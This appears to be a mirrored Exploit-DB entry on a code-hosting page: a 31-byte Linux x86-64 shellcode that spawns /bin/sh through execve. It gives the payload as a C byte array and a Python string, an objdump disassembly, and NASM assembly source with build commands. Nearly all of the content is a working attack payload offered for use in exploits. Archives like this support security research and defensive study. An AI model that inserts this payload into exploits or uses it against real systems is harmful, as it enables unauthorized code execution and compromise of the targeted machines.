bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86-64/41883.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

85 lines
No EOL
3.1 KiB
Text
Raw Permalink Blame History

Hi, This time I wanna to submit a shellcode whose length is 31Bytes , It's
tested on Linux x86-64
;===========================================================
=====================
; The MIT License
;
; Copyright (c) <year> <copyright holders>
;
; Permission is hereby granted, free of charge, to any
person obtaining a copy
; of this software and associated documentation files (the "
Software"), to deal
; in the Software without restriction, including without
limitation the rights
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
; copies of the Software, and to permit persons to whom the Software is
; furnished to do so, subject to the following conditions:
;
; The above copyright notice and this permission notice shall be included in
; all copies or substantial portions of the Software.
;
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHER
WISE, ARISING FROM,
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
; THE SOFTWARE.
;===========================================================
=====================
; Name : Linux/x86-64 - execve("/bin/sh") 31 Bytes
; Author : WangYihang
; Email : wangyihanger@gmail.com
; Tested on: Linux_x86-64
;===========================================================
=====================
; Shellcode (c array) :
char shellcode[] = "
\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05
";
;===========================================================
=====================
; Shellcode (python) :
shellcode = "
\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05
"
;===========================================================
=====================
; objdump -d ./shellcode
shellcode: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 ff xor %rdi,%rdi
400083: 48 31 f6 xor %rsi,%rsi
400086: 48 31 d2 xor %rdx,%rdx
400089: 48 31 c0 xor %rax,%rax
40008c: 50 push %rax
40008d: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
400094: 2f 73 68
400097: 53 push %rbx
400098: 48 89 e7 mov %rsp,%rdi
40009b: b0 3b mov $0x3b,%al
40009d: 0f 05 syscall ============================
=====================
; Assembly language code :
; You can asm it by using :
; nasm -f elf64 ./shellcode.asm
; ld -o shellcode shellcode.o
global _start
_start:
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
xor rax, rax
push rax
; 68 73 2f 2f 6e 69 62 2f
mov rbx, 68732f2f6e69622fH
push rbx
mov rdi, rsp
mov al, 59
syscall
;===========================================================
=====================
Reference in a new issue View git blame Copy permalink